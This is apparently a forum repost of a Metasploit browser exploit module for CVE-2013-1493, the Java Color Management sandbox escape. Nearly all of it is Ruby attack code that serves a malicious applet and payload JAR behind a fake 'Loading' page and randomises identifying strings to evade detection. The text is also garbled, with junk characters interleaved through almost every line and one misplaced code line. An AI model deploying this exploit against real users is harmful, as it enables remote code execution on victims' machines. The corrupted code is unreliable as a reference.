##0 Y, p" w7 `1 Z1 L! u U
; m0 f' v6 I. B; v" Z7 s6 v
# This file is part of the Metasploit Framework and may be subject to I* @( S# V6 A5 @. [
# redistribution and commercial restrictions. Please see the Metasploit0 t; W, o0 e! ?8 p8 c5 o; T
# web site for more information on licensing and terms of use.
8 A% z/ c! b* V. F0 Q3 K# http://metasploit.com/
$ s* i6 i4 f% f##
. T, f/ ?% g6 }2 z9 Drequire ‘msf/core’
* @( p6 ~* L& V2 xrequire ‘rex’
0 H8 d; a+ _4 p" ]class Metasploit3 < Msf::Exploit::Remote$ v- Z$ @+ q3 Q p/ A
Rank = NormalRanking9 H& S m3 d. P8 Q# r
include Msf::Exploit::Remote::HttpServer::HTML
& a/ S9 k- S1 `; y# m* Sinclude Msf::Exploit::EXE
2 {. j, Q: J- P' B iinclude Msf::Exploit::Remote::BrowserAutopwn: S* v$ R* M. `- ]
autopwn_info({ :javascript => false }), r! X* j* o7 V$ f* r8 @$ r# M
def initialize( info = {} )! B" ]' L& P; ~# b4 V& B
super( update_info( info,$ y7 u- _9 N$ M7 S2 Y
‘Name’ => ‘Java CMM Remote Code Execution’,+ U* Q) o8 f) Y
‘Description’ => %q{7 `. v+ M, H/ G& F* t6 j' o( q
This module abuses the Color Management classes from a Java Applet to run9 {& A1 F& c% U1 D H
arbitrary Java code outside of the sandbox as exploited in the wild in February
. I; h6 f9 E V6 eand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
; W7 m" [3 b4 c9 U; ^ L' M, _and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
/ H" G7 l/ I1 D, psystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
! B; H! T: y2 ^warning in order to run the malicious applet.) N7 y( f% B* @+ S
},
8 B& r$ x" y2 S2 {0 \1 m‘License’ => MSF_LICENSE,& h$ z8 Y( L( J* ?! x: k, y
‘Author’ =>+ s0 `9 v! a6 o5 f% U9 x) K
'Unknown', # Vulnerability discovery and Exploit( Z! ?4 W7 \, ~0 b+ f
'juan vazquez' # Metasploit module (just ported the published exploit)
% u3 v3 {, N/ c+ n) z9 v],
/ L; f4 i5 Q. C‘References’ =>$ V# t$ O* u9 }* Q+ x. |
[; ^* R& H/ ?0 \/ @" Y& D
[ 'CVE', '2013-1493' ],6 L( I! I7 J' F" t
[ 'OSVDB', '90737' ],2 u8 J. @4 X! ^( m" _, L
[ 'BID', '58238' ],6 h$ Y, E3 P* E+ ~8 C# y' ^
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],8 T4 c& Q& z9 W2 I# n+ Q
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
8 n; |. `0 _( L" R" [7 l[ 'URL', 'http://pastie.org/pastes/6581034' ]
, v6 K' ]" i& i" _; s* i t],
! u) ]! q% S* h9 W4 ^8 y9 O‘Platform’ => [ 'win', 'java' ],8 J$ w- W0 k, h- S
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
1 x& n7 A- q: x3 x! {‘Targets’ =>3 M3 ^1 B. G% k
[
- N& `. o* ~& n2 c. ?' Z1 \[ 'Generic (Java Payload)'," G- j: x' R* }
{
- Z3 c+ ?' F. H'Platform' => 'java',1 J' j# w) S2 k
'Arch' => ARCH_JAVA! v/ N/ a( |4 [# x( D) `5 u
}
& d* S) J; X( u6 j],' y- Z- ?) N# q5 L' m2 l
[ 'Windows x86 (Native Payload)',1 P8 ?6 p* N2 r% T
{+ b5 t" r4 U% P) f$ T" n
'Platform' => 'win',
) v8 ^0 a: t% L' l'Arch' => ARCH_X86
) _. b& c( j/ D9 r8 j}3 _* K6 h6 U$ x& Y
]$ `* I, q9 l, E- K" X" }" R
],
' t% ?) D) T( g: [' B7 V: J5 E‘‘DisclosureDate’ => ‘Mar 01 2013′
2 Y9 \1 }/ x6 A* x: ~5 Y))
- E4 n; H% f( C6 a2 i8 Y1 Mend
3 Z0 }9 s! ]# E8 n0 b, I2 A6 gdef setup( B4 ^3 u3 S6 S
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)- P, M- I: b3 Y
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
8 T' B5 z8 c8 B' b8 Dpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)/ g. @+ P9 O% Q2 l2 j R8 ?
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }, Q5 J$ K# j4 I- M
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
0 |" G: C% A% \ \$ O& c0 J/ r0 a# \1 Z@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) R" D% t4 Y' }! H/ K2 X1 y' y# `path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)% S: P6 Q! p8 f6 l! p1 `3 O
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 Y1 V0 D v3 O, N6 h@init_class_name = rand_text_alpha(“Init”.length)
( o+ s/ Q/ r& A& d- m- W@init_class.gsub!(“Init”, @init_class_name)
% B$ D6 m4 M' {! g, j9 Gsuper
! s2 c; `4 B1 q/ M0 Z- _. C5 ?9 Nend
/ I# j: x" V0 d, n5 s% ~) z/ U# _def on_request_uri(cli, request)
# i8 K A" |) w$ G9 @print_status(“handling request for #{request.uri}”)
9 G3 T8 W0 j/ Rcase request.uri/ L: A% D) z9 T+ u5 n" {
when /\.jar$/i
: M: e' {9 _. s6 t% tjar = payload.encoded_jar
- v# ]# ?7 U+ A) U; L8 ]/ N: Kjar.add_file(“#{@init_class_name}.class”, @init_class) ^2 g$ U) L- \2 Y, W. t
jar.add_file(“Leak.class”, @leak_class)
; t; J6 I: h5 l( zjar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 }7 B; `8 \& f, B
jar.add_file(“MyColorSpace.class”, @color_space_class)' T6 G- H! ^" ?- b- n1 c/ V# I
DefaultTarget’ => 1,! E/ T/ g2 i5 e9 j/ h* ~% M3 \; [/ t
metasploit_str = rand_text_alpha(“metasploit”.length)
: ^: i7 N( r& R" }; ypayload_str = rand_text_alpha(“payload”.length): Z& ]1 h& x5 B
jar.entries.each { |entry|" W6 H! W A4 S; k
entry.name.gsub!(“metasploit”, metasploit_str)* _' F+ O0 @! y; n' {) h! j
entry.name.gsub!(“Payload”, payload_str): `7 g1 z8 Z* L' v& G) v
entry.data = entry.data.gsub(“metasploit”, metasploit_str)' {9 x0 H# Z4 |4 j# a( a& r
entry.data = entry.data.gsub(“Payload”, payload_str)
' a' g# u4 n# z+ v: U& O* ]- [' u$ [}
7 g8 t4 K2 h: Sjar.build_manifest
/ X0 u6 K) q$ _% S3 X4 Ksend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
# Z- D7 {4 E- E% vwhen /\/$/
3 Q0 }: a" t+ A6 w3 Q9 \* m$ Apayload = regenerate_payload(cli)8 U! V+ ~& U6 t& H; z
if not payload' r2 w" [. s) | Q; [0 C
print_error(“Failed to generate the payload.”)5 J0 d8 f5 s, A8 c
send_not_found(cli) }4 {. H n; `1 s
return' v8 H3 B, {8 e/ n' ]' X+ ?4 j+ y
end
' c' n5 F! D: [1 Z& O4 ysend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })! T9 n, t1 K1 D/ E! [: m
else; H: q e$ O J
send_redirect(cli, get_resource() + ‘/’, ”)7 E$ I4 u6 t1 B7 O' x" B
end! t6 v5 j9 ]; P7 \
end
9 l+ a$ N& J. e N9 i2 }% c9 Y; ^def generate_html2 S) v2 H1 J) H6 e- p5 _
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
/ p) E0 R5 [, x; H2 bhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|1 O' h) J* X9 C, u! T7 L& Z
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
3 A/ a/ f& C$ i+ }$ h0 x& F4 whtml += %Q|</applet></body></html>|8 R; ^. T9 f/ _6 s' S) v: M
return html$ n& B5 }) N( W! n- u! J
end
) i8 G( Y) g* B7 Q- dend, ]: Y& R$ o X5 o
end
& u& u5 `1 m6 W7 G" o( T& [ |
发表于 2013-4-4 17:31:17
收藏
支持
反对